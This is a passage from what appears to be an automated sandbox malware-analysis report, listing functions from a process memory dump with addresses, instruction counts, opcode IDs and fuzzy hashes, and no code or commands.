                                                      • Instruction ID: 2b03f578d094b032bf308c0be516f51c07ba048de4e0c9a50c5212713458790c
                                                      • Opcode Fuzzy Hash: 1d67046eeb3fa4265609f75aa5b8184cb63a994c02c59dfd2bba3ce3d1e66d8f
                                                      • Instruction Fuzzy Hash: 2E01F9B2700704ABD710AB7E9C96F6B77E9DF84215F040469EE06C7140D770ED0086A2
                                                      Function 05846620 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31dc3f821bb75ce9184fb73e9998396e96975575d52a1e899238231e2170ef0f
                                                      • Instruction ID: cededddd2d49916dd71cd45dc93265b532b761f9e70c0d1edcdabb120657970a
                                                      • Opcode Fuzzy Hash: 31dc3f821bb75ce9184fb73e9998396e96975575d52a1e899238231e2170ef0f
                                                      • Instruction Fuzzy Hash: 3411C272A00719ABCB21DF5AC980B5EF7B8FF89750F500454DD05E7200EB30AD058F51
                                                      Function 0583E53E Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction ID: 23c873c8963ea3b8d54d38f7627656b381961b006bca54f02df7b079498b9248
                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction Fuzzy Hash: D211E172705BC99BD7229729C958B357BD9BF0074CF1904A1EE42DB682F72CCC82C292
                                                      Function 0581208A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction ID: 6a5cf1d91bb06f101bb905ad934ea29b342905603fade4c2841a4b5e30094acd
                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction Fuzzy Hash: 7901D4366012108FDF159A2AD884FA2776BBFC4704F5546A5ED07CF25AEA71DC81C790
                                                      Function 0584E5CF Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 862b866ecdd8d472578c9d1562217dc32e62c19d6d77f4656815e82ebe7ffb25
                                                      • Instruction ID: 88524e1c40b0c962fc73101dc55c91f8a3b4d0af2cea471f917e624929865cf8
                                                      • Opcode Fuzzy Hash: 862b866ecdd8d472578c9d1562217dc32e62c19d6d77f4656815e82ebe7ffb25
                                                      • Instruction Fuzzy Hash: 980171713016547FC211BF6DCD84E57BBACFF896647000529B909D3551DB28EC51C6A1
                                                      Function 058520F0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3acb2de2315a802b8ec4a8c8006cc66b340e53d7c01ba4e35456d49fc5bc3a5c
                                                      • Instruction ID: 934d942ed4a81f88fe52393eca545f17d3ba2fb5dd15ae47b0745e494247cebf
                                                      • Opcode Fuzzy Hash: 3acb2de2315a802b8ec4a8c8006cc66b340e53d7c01ba4e35456d49fc5bc3a5c
                                                      • Instruction Fuzzy Hash: F6116D35A0120CEFCF05EF68C855EAE7BB6EB44254F104059FD02D7290DA35AE51CB91
                                                      Function 0580C020 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction ID: 023b4c105dbfeb45cfa78a94b83f6d06401bc940a062fe17f69f931d59bd4693
                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction Fuzzy Hash: CF01F532300708DFDB22DA69D804EA7B7EAFFC4214F044919AD46CB950DE74EC02CB51
                                                      Function 058CF5BE Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6a7f191d67c46e125f5805d93b235c173641f0c4c90e34a49a800004bb2d23b
                                                      • Instruction ID: 76db8fd5c2525311e777ae78228ee22358851712a07ebfce6340315fb5c28ab2
                                                      • Opcode Fuzzy Hash: b6a7f191d67c46e125f5805d93b235c173641f0c4c90e34a49a800004bb2d23b
                                                      • Instruction Fuzzy Hash: 76019E71A00348AFDB04EFA9D845FAEBBB8EF44310F00446ABD00EB280DA74DE41CB91
                                                      Function 058CF453 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1d59fff1db0cd2654ba64169ff5e02b9b8c23ba6b6ff51fa149a56ef8c48aa9
                                                      • Instruction ID: 900121fef0cfc4ecb5688e4c16ce9b8636d73792ded9ce7c614fa1582c774fec
                                                      • Opcode Fuzzy Hash: e1d59fff1db0cd2654ba64169ff5e02b9b8c23ba6b6ff51fa149a56ef8c48aa9
                                                      • Instruction Fuzzy Hash: 94015E71A10358AFDB14EF69D845FAEBBB8EF44710F40446ABD00EB281DA74DE41CB95
                                                      Function 0584D1D0 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                      • Instruction ID: b5fd75936f6d2a93fd25ed718e733f64f6684866a3c56d1f2d9cfd57dc7ac548
                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                      • Instruction Fuzzy Hash: C101D472B06218DBDB11DA58E804F7A73AAEB85634F144116FE25CB290DB34ED41CB92
                                                      Function 058333A5 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                      • Instruction ID: a9cdfb134bff5fc1427edfc2469be7ebad668bf9d23e59bb34ba3b6f5c967e32
                                                      • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                      • Instruction Fuzzy Hash: 8801D672300205B7CB12DB9ADC05E5FBA6CAF94640B144829BD06D7120EE30DD01C7A0
                                                      Function 0582E016 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction ID: a3ceea55b802d4c70f6669906a13a982ac2bb18296bd999bd092832f7398814e
                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction Fuzzy Hash: 8A017C32204694DFD326C61DCA48F367BDDFB44B54F0904A1FD06CBAA1D638DC81C626
                                                      Function 05812582 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8deb099ae5c06d2b2d39d50c6bb56430ff6bc9a4fc7409dd126a5b513fc0ed13
                                                      • Instruction ID: a7444ec380577ba55054d223a6584eaca54df5852ffe123fe381e5d78e128bbb
                                                      • Opcode Fuzzy Hash: 8deb099ae5c06d2b2d39d50c6bb56430ff6bc9a4fc7409dd126a5b513fc0ed13
                                                      • Instruction Fuzzy Hash: FFF0F432741B24B7C731DB5A8C84F57BEAEEB84BA0F104428AE06D7640DA30ED01DBA4
                                                      Function 058D972B Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                      Function 058E5636 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51958cff0cfcb60c027f5f358607c92b3c15e500cb76e6e904aaef499c128520
                                                      • Instruction ID: 47e0dae1870e6ad10ec90bf0022235b2af11d6881d59e4682b255f5433aa4fcd
                                                      • Opcode Fuzzy Hash: 51958cff0cfcb60c027f5f358607c92b3c15e500cb76e6e904aaef499c128520
                                                      • Instruction Fuzzy Hash: 5E116D74E10259EFCB04DFA8D445AAEBBB4EF18304F10845AB915EB351EA34DE02CB55
                                                      Function 058E5537 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d47ca814fffeea73851f90b1b61202d063f082fe4374e5d28c1ec56f6c24a6
                                                      • Instruction ID: d4786e73e4cbdefbdd9e5a74def9cd9296e6ac9fbf690d8ea4e468a83da17ee6
                                                      • Opcode Fuzzy Hash: f1d47ca814fffeea73851f90b1b61202d063f082fe4374e5d28c1ec56f6c24a6
                                                      • Instruction Fuzzy Hash: 0F111B70A10249DFDB04DFA9D545BAEBBF4FF08304F14426AE909EB382EA34D941CB91
                                                      Function 05845734 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                      • Instruction ID: 06b22ca9a2689ce8681ab784d43db647059fca3a1c8085d0aa191e46456e8036
                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                      • Instruction Fuzzy Hash: 0AF0FF72A05218BFE319CF5CC880F6ABBEDEB45650F054079D901DB230E671EE04CA94
                                                      Function 058E5152 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5e847f2eaec9cba6d01a1d8a76f0ca75ff0e5b1afcb3ff8718fef5570ea750b
                                                      • Instruction ID: 49391bbf4dd6a63602e15e6a8eaded37abc354fb415821c845f37acf16c4eac8
                                                      • Opcode Fuzzy Hash: d5e847f2eaec9cba6d01a1d8a76f0ca75ff0e5b1afcb3ff8718fef5570ea750b
                                                      • Instruction Fuzzy Hash: FD015A71A10308ABDB00DFA9D9459EEBBB8EF48314F10045AE900E7241EA34EE018BA1
                                                      Function 058E50D9 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab658c41a33ccf12d9951b9cb3cecbd7d1c6ff7960f93b291fcd15f6829ed8c0
                                                      • Instruction ID: 4ebb26ad5aa168c35c5cec0ca49798c92577f28226e4ffade6843a436245101a
                                                      • Opcode Fuzzy Hash: ab658c41a33ccf12d9951b9cb3cecbd7d1c6ff7960f93b291fcd15f6829ed8c0
                                                      • Instruction Fuzzy Hash: 06015AB1A00309ABCB00DFA9D9459AEBBB8EF49314F50445AE900F7280EA34AD018BA1
                                                      Function 058E5060 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5953f3c73f010f6853fc8c16b3c9de7e3ccde96c3d937eb53bc4895454e3e47f
                                                      • Instruction ID: 1ac6583c4295a1677796d970826e1ad2400b1bc26ce17e3ea3a70ad125c36388
                                                      • Opcode Fuzzy Hash: 5953f3c73f010f6853fc8c16b3c9de7e3ccde96c3d937eb53bc4895454e3e47f
                                                      • Instruction Fuzzy Hash: 38015A71A10308ABCB04DFA9D9459AEBBB8EF48314F10405AF901E7341DA34AE018BA1
                                                      Function 0583C073 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction ID: e7596cd8326ffa3d838b1d054282ed63884ad097c304f83bafac279325b5cbf6
                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction Fuzzy Hash: 99F0C2B2600610ABD334CF4DDC41E67F7EAEFC0A90F048168E946DB220EA31DD04CB90
                                                      Function 058CF78A Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92a27e8330c825393939ac2750c13c5e2210f15c25571bdd6a8ae081409e9af8
                                                      • Instruction ID: c68ed12dd2048286b6f84b60d176316395ccffc294493aa05153ce173e41056a
                                                      • Opcode Fuzzy Hash: 92a27e8330c825393939ac2750c13c5e2210f15c25571bdd6a8ae081409e9af8
                                                      • Instruction Fuzzy Hash: 1D0129B4E00349AFDB04DFA9D445AAEBBF5EF08304F10806AA905E7341EA74DE00CBA1
                                                      Function 058E61E5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 986fe249a08802edc19d75d2d11768c05e644d37baa7fde4df42fdab0be159f7
                                                      • Instruction ID: bc208056ab953a14de4c369992b21c96e9656b3322d13a2fcf471e0d24084ee8
                                                      • Opcode Fuzzy Hash: 986fe249a08802edc19d75d2d11768c05e644d37baa7fde4df42fdab0be159f7
                                                      • Instruction Fuzzy Hash: 16017C71A003499BCB04DFA9E445AAEBBB8AF58310F14005AE901E7280EB34AE01CB95
                                                      Function 0589A4B0 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a634b591634c2c67db630a4e2b79e107dc499a7d095da1b8dd8ab1a87dd95e9
                                                      • Instruction ID: 8d74a6e63572649164f1711ac7fe3f72fb5fa7cddda434fcdfaaabe474affba7
                                                      • Opcode Fuzzy Hash: 4a634b591634c2c67db630a4e2b79e107dc499a7d095da1b8dd8ab1a87dd95e9
                                                      • Instruction Fuzzy Hash: 63019736210219ABCF169F84DC40EDE3FA6FB4C764F0A8101FE19A6220C632D970EF81
                                                      Function 0584656A Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 910da2ec337b7fda64581b5898b4132ddf6c5112f4af946cb2b9d2e18c0db499
                                                      • Instruction ID: ca71a165aeb84c8307fc6078ac365e0c7874ce458e0e61f0d5b2c2ce1fb1bf3f
                                                      • Opcode Fuzzy Hash: 910da2ec337b7fda64581b5898b4132ddf6c5112f4af946cb2b9d2e18c0db499
                                                      • Instruction Fuzzy Hash: 2901AD713087C9DBE722A72C880CF3537A5FB01B08F490591BD02DB6E6EB28DC418A11
                                                      Function 0580C0F0 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d880e279681d653a3f589e3a331aac795f3faeaf81d8da33bd7b7e99065094e
                                                      • Instruction ID: 4ae86b536a6534a2fe5315db2ee4feff743c2658fc805b73d01608826a9cd1a3
                                                      • Opcode Fuzzy Hash: 9d880e279681d653a3f589e3a331aac795f3faeaf81d8da33bd7b7e99065094e
                                                      • Instruction Fuzzy Hash: E5F0B4713043415FE7A4AA1A9C42F32B2ABE7D4755F65917AEE06CB2C0FA71DC0283E5
                                                      Function 058E3749 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction ID: 7f81323c7f3ad2e42269ad0c2603118f33142a748761add83d8cfad3fc521971
                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction Fuzzy Hash: ACF04FB6A40308BFE711EB68CD41FEA77BCEB04714F000566AD56E7290EA70AE44CB91
                                                      Function 058E55C9 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32f0873374831c830c0834811ca594688e449a22b561deffb60eef5aa4e792f4
                                                      • Instruction ID: c5be0f954e4683e48fb210392ec713282d5a0183f6124916ee244e5ff30f97bc
                                                      • Opcode Fuzzy Hash: 32f0873374831c830c0834811ca594688e449a22b561deffb60eef5aa4e792f4
                                                      • Instruction Fuzzy Hash: 64F03C74A10348AFCB04EFA8D545AAEBBF4EF19304F504459B805EB391EA74DE00CB55
                                                      Function 058CF3E6 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eca9dab45697f00f6be8b8ef0cb0f67e3e1b14f279ba3f3be66f5b9c487d5620
                                                      • Instruction ID: 07842c263d4a6edf4763f986e2eaee274527f245e72f26c7de5ce3ea65e1309c
                                                      • Opcode Fuzzy Hash: eca9dab45697f00f6be8b8ef0cb0f67e3e1b14f279ba3f3be66f5b9c487d5620
                                                      • Instruction Fuzzy Hash: A5F08C71A00308AFCB04EFA8D509A9EBBF4EF08300F4040A9BD05EB381EA34DE40CB55
                                                      Function 058147FB Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db4c80238c3cd7f887688b1d8af80e39f9b9d950d251cf65fe7ce158441f1f59
                                                      • Instruction ID: 4e7db9352bb4165ada31fa8ac5d197c29f32caa39409d2ea215d36b6fe9a1d51
                                                      • Opcode Fuzzy Hash: db4c80238c3cd7f887688b1d8af80e39f9b9d950d251cf65fe7ce158441f1f59
                                                      • Instruction Fuzzy Hash: A6F0673191A7E49EDF22DB68804AF21B79DAB09724F08896ADC8AC7561CA24DCC0C759
                                                      Function 058CF6C7 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb2c30d42dcf317cba0e1b29cfeddedf8f776f4a412485d087078d9d4e29fe1d
                                                      • Instruction ID: ece428caeb04385ce1018bfc6bc7550f86b690c78534063fbb489978158df990
                                                      • Opcode Fuzzy Hash: fb2c30d42dcf317cba0e1b29cfeddedf8f776f4a412485d087078d9d4e29fe1d
                                                      • Instruction Fuzzy Hash: 36F06271A10348EFDB04DFA9D405EAEBBF4EF44304F004459E901EB291EA34DD00CB55
                                                      Function 058D0115 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75f4bdc547a45367f7ae4403d1aaa3434552e0f38376eb003671f8f745a8f60c
                                                      • Instruction ID: 24289fe0478eb7192e4e4b1b7f7c104617dff8afbef144a19cb8f8a694753e82
                                                      • Opcode Fuzzy Hash: 75f4bdc547a45367f7ae4403d1aaa3434552e0f38376eb003671f8f745a8f60c
                                                      • Instruction Fuzzy Hash: 44F0276652E7C0CECF227B2CA49D6A1AFE5A781410F092889ECB1DB201DB74CC93C231
                                                      Function 0584C5ED Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08a5888f5ad36f6e674665bbc0b831318ef06d97c5faad1c7d8542d695d260f5
                                                      • Instruction ID: cdb4cabc952d5bc0ad9427775aacd6ae8aa31e9a9ef11ae4ef12f39004fe8d2c
